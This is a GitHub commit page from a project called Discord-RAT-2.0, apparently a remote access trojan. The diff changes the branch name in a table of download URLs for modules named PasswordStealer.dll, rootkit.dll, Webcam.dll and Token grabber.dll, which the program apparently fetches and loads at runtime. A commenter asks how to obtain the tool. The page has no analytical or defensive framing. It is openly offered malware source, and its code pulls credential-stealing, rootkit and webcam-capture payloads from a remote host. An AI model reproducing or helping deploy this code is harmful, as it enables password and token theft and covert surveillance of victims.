Skip to content

Commit

Permalink
branch change from main to master
Browse files Browse the repository at this point in the history
  • Loading branch information
moom825 authored Aug 3, 2022
1 parent a20cb24 commit c6385ae
Showing 1 changed file with 6 additions and 6 deletions.
12 changes: 6 additions & 6 deletions Discord rat/Program.cs
Original file line number Diff line number Diff line change
Expand Up @@ -153,11 +153,11 @@ internal struct LASTINPUTINFO
public static Dictionary<string, Assembly> dll_holder = new Dictionary<string, Assembly>();
public static Dictionary<string, object> activator_holder = new Dictionary<string, object>();
public static Dictionary<string, string> dll_url_holder = new Dictionary<string, string> {
{"password", "https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/main/Discord%20rat/Resources/PasswordStealer.dll"},
{ "rootkit","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/main/Discord%20rat/Resources/rootkit.dll"},
{ "unrootkit","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/main/Discord%20rat/Resources/unrootkit.dll"},
{ "webcam","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/main/Discord%20rat/Resources/Webcam.dll"},
{ "token","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/main/Discord%20rat/Resources/Token%20grabber.dll"}
{"password", "https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordStealer.dll"},
{ "rootkit","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll"},
{ "unrootkit","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.dll"},
{ "webcam","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll"},
{ "token","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll"}
};
public static Dictionary<object, object> ObjectToDictionary(object obb)
{
Expand Down Expand Up @@ -1267,4 +1267,4 @@ public static async Task CommandHandler(string message_content, string[] attachm
}
}
}
}
}

1 comment on commit c6385ae

@Deepwokener
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'm new to this stuff and dont know how to get this

Please sign in to comment.